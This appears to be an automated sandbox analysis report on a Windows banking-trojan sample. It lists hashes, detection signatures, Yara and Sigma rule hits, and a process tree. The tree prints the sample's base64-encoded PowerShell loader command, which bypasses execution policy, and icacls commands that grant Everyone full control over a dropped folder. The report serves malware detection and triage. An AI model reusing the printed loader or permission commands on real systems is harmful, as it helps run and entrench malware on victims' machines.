Edit tour
Windows
Analysis Report
RcFBMph6zu.exe
Overview
General Information
| Sample name: | RcFBMph6zu.exerenamed because original name is a hash value |
| Original sample name: | 7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab.exe |
| Analysis ID: | 1578840 |
| MD5: | 6b5c558a9c8728fdd47e7d8c20cab5ff |
| SHA1: | 2e3761639e85fe8143620d04f0f03e5b30207de4 |
| SHA256: | 7763f41947263d5b64cb49c2178292e26d6c10b033f530435726fa43340468ab |
| Tags: | bankerexelatamPAGAMENTOS-DIGITAIS-LTDAtrojanuser-johnk3r |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Compliance
| Score: | 48 |
| Range: | 0 - 100 |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains very large strings
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Switches to a custom stack to bypass stack traces
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
RcFBMph6zu.exe (PID: 3136 cmdline: "C:\Users\ user\Deskt op\RcFBMph 6zu.exe" MD5: 6B5C558A9C8728FDD47E7D8C20CAB5FF) 
powershell.exe (PID: 7108 cmdline: "C:\Window s\system32 \windowspo wershell\v 1.0\powers hell.exe" -sta -nopr ofile -exe cutionpoli cy bypass -encodedco mmand JAB4 AD0AJwA1AG YAYgA2ADgA OQA1ADAALQ A5AGEAYgBl AC0ANABhAD kAMQAtADgA ZABmADcALQ A5ADIANQBj ADQANAAxAD gAMwBlAGUA MgAnADsAJA B5AD0AJwBD ADoAXABVAH MAZQByAHMA XABlAG4AZw BpAG4AZQBl AHIAXABEAG UAcwBrAHQA bwBwAFwAUg BjAEYAQgBN AHAAaAA2AH oAdQAuAGUA eABlACcAOw B0AHIAeQAg AHsADQAKAC AAIABpAGYA IAAoAFsARQ BuAHYAaQBy AG8AbgBtAG UAbgB0AF0A OgA6AFYAZQ ByAHMAaQBv AG4ALgBNAG EAagBvAHIA IAAtAGcAZQ AgADQAKQAN AAoAIAAgAH sAIAAkAG4A dQBsAGwAIA A9ACAAWwBS AGUAZgBsAG UAYwB0AGkA bwBuAC4AQQ BzAHMAZQBt AGIAbAB5AF 0AOgA6AFUA bgBzAGEAZg BlAEwAbwBh AGQARgByAG 8AbQAoACQA eQApACAAfQ AgAGUAbABz AGUAIAB7AC AAJABuAHUA bABsACAAPQ AgAFsAUgBl AGYAbABlAG MAdABpAG8A bgAuAEEAcw BzAGUAbQBi AGwAeQBdAD oAOgBMAG8A YQBkAEYAaQ BsAGUAKAAk AHkAKQB9AA 0ACgAgACAA LgAgACgAWw BfADMAMgAu AF8AOAA4AF 0AOgA6AF8A NwA0ACgAJA B4ACkAKQAN AAoAIAAgAG UAeABpAHQA IAAkAEwAQQ BTAFQARQBY AEkAVABDAE 8ARABFAA0A CgB9ACAADQ AKAGMAYQB0 AGMAaAAgAF sATgBvAHQA UwB1AHAAcA BvAHIAdABl AGQARQB4AG MAZQBwAHQA aQBvAG4AXQ ANAAoAewAN AAoAIAAgAF cAcgBpAHQA ZQAtAEgAbw BzAHQAIAAn AEEAcABwAG wAaQBjAGEA dABpAG8Abg AgAGwAbwBj AGEAdABpAG 8AbgAgAGkA cwAgAHUAbg B0AHIAdQBz AHQAZQBkAC 4AIABDAG8A cAB5ACAAZg BpAGwAZQAg AHQAbwAgAG EAIABsAG8A YwBhAGwAIA BkAHIAaQB2 AGUALAAgAG EAbgBkACAA dAByAHkAIA BhAGcAYQBp AG4ALgAnAC AALQBGAG8A cgBlAGcAcg BvAHUAbgBk AEMAbwBsAG 8AcgAgAFIA ZQBkAA0ACg B9AA0ACgBj AGEAdABjAG gAIAB7AA0A CgAgACAAVw ByAGkAdABl AC0ASABvAH MAdAAgACgA IgBFAHIAcg BvAHIAOgAg ACIAIAArAC AAJABfAC4A RQB4AGMAZQ BwAHQAaQBv AG4ALgBNAG UAcwBzAGEA ZwBlACkAIA AtAEYAbwBy AGUAIABSAG UAZAAgAA0A CgB9AA== MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 3488 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
icacls.exe (PID: 936 cmdline: "C:\Window s\system32 \icacls.ex e" C:\Nvid ia-48001 / grant Ever yone:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D) 
WmiPrvSE.exe (PID: 6724 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - icacls.exe (PID: 4776 cmdline:
"C:\Window s\system32 \icacls.ex e" C:\Nvid ia-48001\N vidia-4800 1.exe /gra nt Everyon e:F /T /C MD5: 48C87E3B3003A2413D6399EA77707F5D) 
Nvidia-48001.exe (PID: 4256 cmdline: "C:\Nvidia -48001\Nvi dia-48001. exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- svchost.exe (PID: 1364 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Nvidia-48001.exe (PID: 2032 cmdline:
"C:\Nvidia -48001\Nvi dia-48001. exe" MD5: D11828146FF9E2E340C555F9531CAC47)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Christopher Peacock '@securepeacock', SCYTHE: | ||
| Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: | ||